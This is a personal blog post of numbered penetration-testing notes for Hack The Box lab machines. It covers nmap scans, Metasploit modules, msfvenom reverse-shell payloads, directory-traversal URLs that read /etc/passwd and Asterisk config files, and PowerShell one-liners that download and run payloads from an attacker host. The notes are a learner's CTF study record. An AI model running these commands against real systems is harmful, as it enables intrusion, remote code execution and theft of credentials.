Wednesday, October 7, 2020

My Technical record related to penetration testing, HTB ,...

 

1.      Ctrl+Shift+R  - reverse search – search from history in Linux terminal

2.     Tmux  -  tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window

 

3.      nmap -sV -O -F --version-light 10.10.10.4

a.      -sV: Probe open ports to determine service/version info

b.      -O: Enable OS detection

c.       -F: Fast mode - Scan fewer ports than the default scan

d.      --version-light: Limit to most likely probes (intensity 2)

e.      10.10.10.4: IP address of the Legacy box

 

4.     Check for a exploit on a shell opened machine: Required for Privilege Escalation:

https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

 

use post/multi/recon/local_exploit_suggester

then set session 1

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in Meterpreter.

 

5.      Search for a file in rce system:

è search -f user.txt
6.  Create Exploit using msfvenom:
àmsfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx   LHOST=10.10.14.15 LPORT=4444
 

-p: Payload to use

-f: Output format

-0: Save the payload to a file

LHOST: Local host

LPORT: Local port

Now upload a file (by put/upload/download by python server)

Start listening on multi/handler and then run the uploaded exploit on victim machine – it will create session

 

7.  Check for FTP service by NMAp à
è nmap -A -p21 -v 10.10.10.5
 
8.  Elastix login portal à is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialling.

 

Available exploit for Elastix - 2.0 - 'graph.php' Local File Inclusion

Payload à https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

9.  SSH connect à ssh root@10.10.10.7
10. Get details of exploit by searchploit à  searchsploit -x 18770.txt
11. In case of OpenSSL in exploit – can be set proxy à set proxies http:127.0.0.1:8080

12.   Default Worldlist path of Dirbuster à /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

13.   Vtiger vulnerable version – 5.4.0 – RCE/CSRF/LFI  à searchsploit vtiger,

https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../etc/asterisk/manager.conf%00

14.   nmap script to get more things from that rpcbind    à nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

15.   Mount a backup if any unmounted site backup available à sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

16.   Strart Apache service à systemctl start apache2

17.   NMAP - 80/tcp open  http    HttpFileServer httpd 2.3  -

Exploit -Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) 

 

18. SET payload for 64 bit system - set payload windows/x64/meterpreter/reverse_tcp

19.   Privilege escalation – in windows 2012 r2 – exploit – MS16-098 – 41020.exe

àC:\Users\kostas\Desktop>41020.exe

41020.exe

Microsoft Windows [Version 6.3.9600]

(c) 2013 Microsoft Corporation. All rights reserved.

à C:\Users\kostas\Desktop>cd C:\Administrator\Desktop

àC:\Users\Administrator\Desktop>type root.txt

20.   Command to take data in clipbord à Cat abc.txt |xclip   

21.   Run a server in kali on port 8000àPython -m SimpleHTTPServer 

22.   Run on victim machine to download the file à powershell “IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/exploit.html')”

23.   msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f exe > writeup.exe

24.   powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.16:8000/writeup64.exe', 'writeup64.exe')"

25.   If METERPRETER running, check the running process à ps

26.   Migrate on any running processes à migrate process_ID.

27.   Unset a set value in Metasploit à unset parameter

28.   Ncat -lvnp 4444 à allies l-listen, v-verbos, n- don’t do dns, p-port

29.   If get user session on target machine, now need to move with admin previleges -> migrate to a stable session in window ->  3004  580   davcdata.exe       x86   0        NT  AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

 à migrate 3004

30.   A exploit in windows 2003 r2 for admin privileges escalation --windows/local/ms14_070_tcpip_ioctl

...

Posted by at No comments:
Subscribe to: Posts (Atom)